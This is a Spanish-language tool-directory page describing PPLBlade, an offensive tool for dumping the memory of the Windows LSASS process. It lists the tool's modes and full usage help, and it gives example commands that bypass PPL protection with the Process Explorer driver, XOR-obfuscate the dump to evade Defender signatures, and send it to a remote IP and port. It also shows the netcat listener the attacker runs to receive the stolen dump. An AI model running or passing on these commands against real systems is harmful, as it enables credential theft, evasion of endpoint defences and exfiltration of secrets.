Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PPLBlade — Bypassa la protección PPL para realizar un volcado de la memoria del proceso LSASS, ofusca los archivos de volcado con XOR, y los exfiltra de forma remota mediante RAW o SMB sin escribir en disco. | Kitploit
Herramientas/GitHubGitHub/tastypepperoni/pplblade
Escalada de PrivilegiosForensia de MemoriaExplotaciónExfiltración de DatosPost-Explotación
GitHubtastypepperoni/pplblade

PPLBlade

Bypassa la protección PPL para realizar un volcado de la memoria del proceso LSASS, ofusca los archivos de volcado con XOR, y los exfiltra de forma remota mediante RAW o SMB sin escribir en disco.

Ver Repositorio
59763hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PPLBlade

Herramienta de volcado de procesos protegidos que soporta la ofuscación del volcado de memoria y su transferencia a estaciones de trabajo remotas sin guardarlo en el disco.

Funcionalidades clave:

  1. Evitar la protección PPL
  2. Ofuscar archivos de volcado de memoria para evadir los mecanismos de detección basados en firmas de Defender
  3. Subir el volcado de memoria mediante métodos RAW y SMB sin guardarlo en el disco (volcado sin archivos)

Una visión general de las técnicas utilizadas en esta herramienta se puede encontrar aquí: https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6

Tenga en cuenta que PROCEXP15.SYS aparece en los archivos fuente para fines de compilación. No es necesario transferirlo a la máquina objetivo junto con PPLBlade.exe.

Ya está incrustado en PPLBlade.exe. El exploit es un solo ejecutable.

Modos:

  1. Volcado - Volcar la memoria del proceso usando PID o nombre del proceso
  2. Descifrar - Revertir el archivo de volcado ofuscado (--obfuscate) a su estado original
  3. Limpiar - Realizar la limpieza manualmente, en caso de que algo salga mal durante la ejecución (Tenga en cuenta que los valores de las opciones deben ser los mismos que los de la ejecución que estamos tratando de limpiar)
  4. DoThatLsassThing - Volcar lsass.exe usando el controlador de Process Explorer (PoC básico)

Modos de identificador:

  1. Directo - Abre un identificador PROCESS_ALL_ACCESS directamente, usando la función OpenProcess()
  2. Procexp - Usa PROCEXP152.sys para obtener un identificador
root@kitploit:~
Usage of PPLBlade.exe:
  -driver string
        Path where the driver file will be dropped (default: current directory)
  -dumpmode string
        Dump mode [local|network] (default "local")
  -dumpname string
        Name of the dump file (default "PPLBlade.dmp")
  -handle string
        Method to obtain target process handle [direct|procexp] (default "direct")
  -help
        Prints this help message
  -ip string
        IP of the remote server
  -key string
        XOR Key for obfuscation (default "PPLBlade")
  -mode string
        Kill or Dump process [dump|decrypt|cleanup|dothatlsassthing] (default "dump")
  -name string
        Process name of target process
  -network string
        Method for network transfer[raw|smb] (default "raw")
  -obfuscate
        Obfuscate dump file
  -pass string
        SMB password
  -pid int
        PID of target process (prioritized over process name)
  -port int
        PORT on the remote server
  -quiet
        Quiet mode
  -service string
        Name of the service (default "PPLBlade")
  -share string
        share name
  -user string
        SMB username

Examples:
PPLBlade.exe --mode dothatlsassthing
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
PPLBlade.exe --mode decrypt --dumpname PPLBlade.dmp --key PPLBlade
PPLBlade.exe --mode cleanup

Ejemplos:

PoC básico que utiliza PROCEXP152.sys para volcar lsass:

root@kitploit:~
PPLBlade.exe --mode dothatlsassthing

(Tenga en cuenta que no aplica XOR al archivo de volcado, proporcione el indicador adicional --obfuscate para habilitar la funcionalidad XOR)

Subir el volcado ofuscado de LSASS a una ubicación remota:

root@kitploit:~
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

Anfitrión atacante:

root@kitploit:~
nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp

Desofuscar volcado de memoria:

root@kitploit:~
PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade
Descargar herramienta